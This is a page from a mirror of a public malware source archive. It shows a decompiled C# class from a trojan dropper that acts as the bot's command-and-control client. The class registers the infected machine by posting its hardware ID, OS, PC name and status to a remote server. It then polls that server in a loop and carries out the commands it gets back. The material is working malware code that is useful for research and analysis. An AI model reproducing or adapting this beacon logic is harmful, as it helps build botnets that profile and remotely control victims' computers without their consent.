mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 21:05:28 +00:00
f2ac1ece55
add
199 lines
6.2 KiB
C#
199 lines
6.2 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: Poly._communicate
|
|
// Assembly: Poly, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 618F3010-979B-4F78-8F99-D5C35E30AA2E
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc.exe
|
|
|
|
using System;
|
|
using System.Collections.Specialized;
|
|
using System.Net;
|
|
using System.Text;
|
|
using System.Threading;
|
|
|
|
namespace Poly
|
|
{
|
|
internal class _communicate : Base_Settings
|
|
{
|
|
private static int Return;
|
|
private static NameValueCollection sendData;
|
|
private static string url;
|
|
private static string uA;
|
|
|
|
public static event _communicate.ModeChangedHandler ModeChange;
|
|
|
|
public override void Initialise() => this.registerClient();
|
|
|
|
public override void Run() => new Thread(new ThreadStart(this.listen)).Start();
|
|
|
|
public static void setReturn(int iReturn) => _communicate.Return = iReturn;
|
|
|
|
private static void initRegistryData()
|
|
{
|
|
_communicate.sendData = new NameValueCollection();
|
|
_communicate.uA = Base_Settings.userAgent;
|
|
_communicate.url = Base_Settings.httpURL;
|
|
_communicate.sendData["hwid"] = Base_Settings.hwid;
|
|
_communicate.sendData["mode"] = Base_Settings.mode.ToString();
|
|
_communicate.sendData["os"] = Base_Settings.os;
|
|
_communicate.sendData["pc"] = Base_Settings.pcName;
|
|
_communicate.sendData["status"] = Base_Settings.status;
|
|
}
|
|
|
|
private static void initTalkData()
|
|
{
|
|
_communicate.sendData = new NameValueCollection();
|
|
_communicate.sendData["mode"] = Base_Settings.mode.ToString();
|
|
_communicate.sendData["status"] = Base_Settings.status;
|
|
_communicate.sendData["hwid"] = Base_Settings.hwid;
|
|
_communicate.sendData["return"] = _communicate.Return.ToString();
|
|
}
|
|
|
|
public void registerClient()
|
|
{
|
|
try
|
|
{
|
|
if (Base_Settings.mode == 0)
|
|
{
|
|
_communicate.initRegistryData();
|
|
_communicate.talk();
|
|
if (!(Base_Settings.response[0] == Base_Settings.hwid))
|
|
return;
|
|
Base_Settings.captured = true;
|
|
Base_Settings.mode = 1;
|
|
Base_Settings.busy = false;
|
|
}
|
|
else
|
|
_communicate.talk();
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
Console.WriteLine("There was a problem with registering client\n Error: {0} \n^Handled by regClient", (object) ex.ToString());
|
|
}
|
|
}
|
|
|
|
public void listen()
|
|
{
|
|
int num = 0;
|
|
Console.WriteLine("Listener Started");
|
|
while (true)
|
|
{
|
|
while (Base_Settings.busy)
|
|
{
|
|
Console.WriteLine("Stuck");
|
|
Thread.Sleep(Base_Settings.interval * 1000);
|
|
}
|
|
if (Base_Settings.captured)
|
|
{
|
|
Console.WriteLine("Captured");
|
|
_communicate.talk();
|
|
if (Base_Settings.response[0] != null && Base_Settings.response[0] != Base_Settings.hwid)
|
|
{
|
|
switch (Base_Settings.response[0])
|
|
{
|
|
case "0":
|
|
case "1":
|
|
case "2":
|
|
case "3":
|
|
case "4":
|
|
Console.WriteLine("Setting mode to 'Active'");
|
|
this.setMode(2);
|
|
break;
|
|
case "5":
|
|
Console.WriteLine("ABORT ALL!");
|
|
Function.Abort();
|
|
Base_Settings.mode = 2;
|
|
_communicate.setReturn(1);
|
|
break;
|
|
case "00":
|
|
Console.WriteLine("Restart code processed");
|
|
this.restartConnection();
|
|
break;
|
|
default:
|
|
Console.WriteLine("No command detected");
|
|
Base_Settings.mode = 1;
|
|
break;
|
|
}
|
|
}
|
|
else if (Base_Settings.response[0] == Base_Settings.hwid)
|
|
{
|
|
Base_Settings.status = "Idle";
|
|
Console.WriteLine("Neutral");
|
|
}
|
|
else
|
|
{
|
|
Base_Settings.status = "Inactive";
|
|
Console.WriteLine("Idling hoHum...");
|
|
}
|
|
Console.WriteLine("Status = {0}", (object) Base_Settings.status);
|
|
}
|
|
else if (Base_Settings.captured)
|
|
{
|
|
_communicate.talk();
|
|
}
|
|
else
|
|
{
|
|
Console.WriteLine("Client not registered. Attmepting to register");
|
|
this.restartConnection();
|
|
++num;
|
|
}
|
|
Thread.Sleep(Base_Settings.interval * 1000);
|
|
}
|
|
}
|
|
|
|
private static void talk()
|
|
{
|
|
Base_Settings.busy = true;
|
|
if (Base_Settings.mode != 0)
|
|
{
|
|
_communicate.initTalkData();
|
|
Console.WriteLine("Send data return = {0}", (object) _communicate.sendData["return"]);
|
|
Console.WriteLine("Current mode = {0}", (object) Base_Settings.mode);
|
|
}
|
|
try
|
|
{
|
|
WebClient webClient = new WebClient();
|
|
webClient.Headers.Add("user-agent", _communicate.uA);
|
|
string str = Encoding.UTF8.GetString(webClient.UploadValues(_communicate.url, "POST", _communicate.sendData));
|
|
string[] strArray = str.Split('|');
|
|
Base_Settings.response = str.Split('|');
|
|
Base_Settings.command = strArray[0];
|
|
Console.WriteLine(Base_Settings.command);
|
|
webClient.Dispose();
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
Console.WriteLine("There was an error with Talking.\n Error: {0}\n ^Handled by talk", (object) ex.ToString());
|
|
}
|
|
Base_Settings.busy = false;
|
|
}
|
|
|
|
public void restartConnection()
|
|
{
|
|
Console.WriteLine("Restart code processed. Calling registerClient()");
|
|
Base_Settings.busy = true;
|
|
Base_Settings.mode = 0;
|
|
this.registerClient();
|
|
Base_Settings.busy = false;
|
|
}
|
|
|
|
public static void forceTalk() => _communicate.talk();
|
|
|
|
protected void OnModeChange(object sender, EventArgs data)
|
|
{
|
|
if (_communicate.ModeChange == null)
|
|
return;
|
|
_communicate.ModeChange((object) this, data);
|
|
}
|
|
|
|
public void setMode(int i1)
|
|
{
|
|
Base_Settings.mode = i1;
|
|
if (i1 != 2)
|
|
return;
|
|
this.OnModeChange((object) this, (EventArgs) new ModeChangedArgs());
|
|
}
|
|
|
|
public delegate void ModeChangedHandler(object sender, EventArgs e);
|
|
}
|
|
}
|